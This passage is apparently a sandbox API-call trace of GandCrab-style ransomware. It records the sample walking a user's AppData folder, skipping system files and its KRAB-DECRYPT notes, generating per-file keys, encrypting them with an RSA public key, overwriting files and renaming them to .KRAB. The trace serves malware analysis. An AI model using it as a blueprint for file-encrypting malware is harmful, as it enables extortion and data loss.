(lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.564] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0085.565] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.565] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\waoGyRe3.mp3") returned 50 [0085.565] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\waoGyRe3.mp3") returned 50 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="desktop.ini") returned 1 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="autorun.inf") returned 1 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="ntuser.dat") returned 1 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="iconcache.db") returned 1 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="bootsect.bak") returned 1 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="boot.ini") returned 1 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="ntuser.dat.log") returned 1 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="thumbs.db") returned 1 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="ntldr") returned 1 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="NTDETECT.COM") returned 1 [0085.565] lstrcmpiW (lpString1="waoGyRe3.mp3", lpString2="Bootfont.bin") returned 1 [0085.566] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.566] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011678) returned 1 [0085.567] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.568] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.568] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.568] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0085.568] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0085.568] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.568] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010bd8) returned 1 [0085.570] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.570] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.571] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.571] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0085.571] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0085.571] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.571] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011700) returned 1 [0085.572] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1022ff8) returned 1 [0085.573] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.573] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.573] GetLastError () returned 0x0 [0085.573] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0085.573] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0085.573] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011458) returned 1 [0085.574] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1022ff8) returned 1 [0085.575] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.575] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.575] GetLastError () returned 0x0 [0085.575] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0085.575] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0085.575] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\waoGyRe3.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\waogyre3.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0085.576] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.576] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.576] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0xa8f4, lpOverlapped=0x0) returned 1 [0085.592] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff570c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.592] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xa8f4, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0xa8f4, lpOverlapped=0x0) returned 1 [0085.592] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0085.592] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.598] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.599] CloseHandle (hObject=0x3a8) returned 1 [0085.599] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.599] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\waoGyRe3.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\waogyre3.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\waoGyRe3.mp3.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\waogyre3.mp3.krab")) returned 1 [0085.600] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.600] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0085.600] lstrcmpW (lpString1="xZmPn47Fywi0P.png", lpString2=".") returned 1 [0085.600] lstrcmpW (lpString1="xZmPn47Fywi0P.png", lpString2="..") returned 1 [0085.600] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="xZmPn47Fywi0P.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\xZmPn47Fywi0P.png") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\xZmPn47Fywi0P.png" [0085.600] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.601] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\xZmPn47Fywi0P.png.KRAB") returned 60 [0085.601] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\xZmPn47Fywi0P.png") returned 55 [0085.601] lstrlenW (lpString=".png") returned 4 [0085.601] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.601] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".png ") returned 5 [0085.601] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.601] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\xZmPn47Fywi0P.png") returned 55 [0085.602] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\xZmPn47Fywi0P.png") returned 55 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="desktop.ini") returned 1 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="autorun.inf") returned 1 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="ntuser.dat") returned 1 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="iconcache.db") returned 1 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="bootsect.bak") returned 1 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="boot.ini") returned 1 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="ntuser.dat.log") returned 1 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="thumbs.db") returned 1 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="KRAB-DECRYPT.html") returned 1 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="ntldr") returned 1 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="NTDETECT.COM") returned 1 [0085.602] lstrcmpiW (lpString1="xZmPn47Fywi0P.png", lpString2="Bootfont.bin") returned 1 [0085.602] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.602] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0085.604] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.604] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.605] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.605] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0085.605] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0085.605] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.605] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010bd8) returned 1 [0085.606] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.607] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.607] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.607] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0085.607] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0085.607] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.608] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10111b0) returned 1 [0085.609] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10234f8) returned 1 [0085.610] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.610] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.610] GetLastError () returned 0x0 [0085.610] CryptDestroyKey (hKey=0x10234f8) returned 1 [0085.610] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0085.610] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010930) returned 1 [0085.612] CryptImportKey (in: hProv=0x1010930, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10235f8) returned 1 [0085.612] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.612] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.612] GetLastError () returned 0x0 [0085.612] CryptDestroyKey (hKey=0x10235f8) returned 1 [0085.612] CryptReleaseContext (hProv=0x1010930, dwFlags=0x0) returned 1 [0085.612] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\xZmPn47Fywi0P.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\xzmpn47fywi0p.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0085.613] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.613] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.613] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x484b, lpOverlapped=0x0) returned 1 [0085.652] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffb7b5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.652] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x484b, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x484b, lpOverlapped=0x0) returned 1 [0085.653] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0085.653] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.678] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.678] CloseHandle (hObject=0x3a8) returned 1 [0085.678] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.680] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\xZmPn47Fywi0P.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\xzmpn47fywi0p.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\xZmPn47Fywi0P.png.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\xzmpn47fywi0p.png.krab")) returned 1 [0085.681] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.681] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0085.681] lstrcmpW (lpString1="Y01YAx1z-bntirNC.wav", lpString2=".") returned 1 [0085.681] lstrcmpW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="..") returned 1 [0085.681] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Y01YAx1z-bntirNC.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Y01YAx1z-bntirNC.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Y01YAx1z-bntirNC.wav" [0085.681] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.681] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Y01YAx1z-bntirNC.wav.KRAB") returned 63 [0085.681] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Y01YAx1z-bntirNC.wav") returned 58 [0085.681] lstrlenW (lpString=".wav") returned 4 [0085.681] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.682] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0085.682] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.682] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Y01YAx1z-bntirNC.wav") returned 58 [0085.682] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Y01YAx1z-bntirNC.wav") returned 58 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="desktop.ini") returned 1 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="autorun.inf") returned 1 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="ntuser.dat") returned 1 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="iconcache.db") returned 1 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="bootsect.bak") returned 1 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="boot.ini") returned 1 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="ntuser.dat.log") returned 1 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="thumbs.db") returned 1 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="KRAB-DECRYPT.html") returned 1 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="ntldr") returned 1 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="NTDETECT.COM") returned 1 [0085.682] lstrcmpiW (lpString1="Y01YAx1z-bntirNC.wav", lpString2="Bootfont.bin") returned 1 [0085.682] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.683] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010c60) returned 1 [0085.684] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.685] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.685] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.685] CryptGenRandom (in: hProv=0x1010c60, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0085.685] CryptReleaseContext (hProv=0x1010c60, dwFlags=0x0) returned 1 [0085.685] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.685] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011238) returned 1 [0085.687] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.688] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.688] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.688] CryptGenRandom (in: hProv=0x1011238, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0085.688] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0085.688] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.689] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011238) returned 1 [0085.690] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1023cb8) returned 1 [0085.690] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.690] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.691] GetLastError () returned 0x0 [0085.691] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0085.691] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0085.691] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010820) returned 1 [0085.692] CryptImportKey (in: hProv=0x1010820, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1023cb8) returned 1 [0085.692] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.692] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.693] GetLastError () returned 0x0 [0085.693] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0085.693] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0085.693] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Y01YAx1z-bntirNC.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\y01yax1z-bntirnc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0085.693] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.694] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.694] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x2956, lpOverlapped=0x0) returned 1 [0085.710] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffd6aa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.710] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2956, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x2956, lpOverlapped=0x0) returned 1 [0085.710] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0085.710] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.714] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.715] CloseHandle (hObject=0x3a8) returned 1 [0085.715] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.715] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Y01YAx1z-bntirNC.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\y01yax1z-bntirnc.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Y01YAx1z-bntirNC.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\y01yax1z-bntirnc.wav.krab")) returned 1 [0085.716] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.716] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0085.716] lstrcmpW (lpString1="YWHFzy9UAIlji.mp3", lpString2=".") returned 1 [0085.716] lstrcmpW (lpString1="YWHFzy9UAIlji.mp3", lpString2="..") returned 1 [0085.716] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="YWHFzy9UAIlji.mp3" | out: 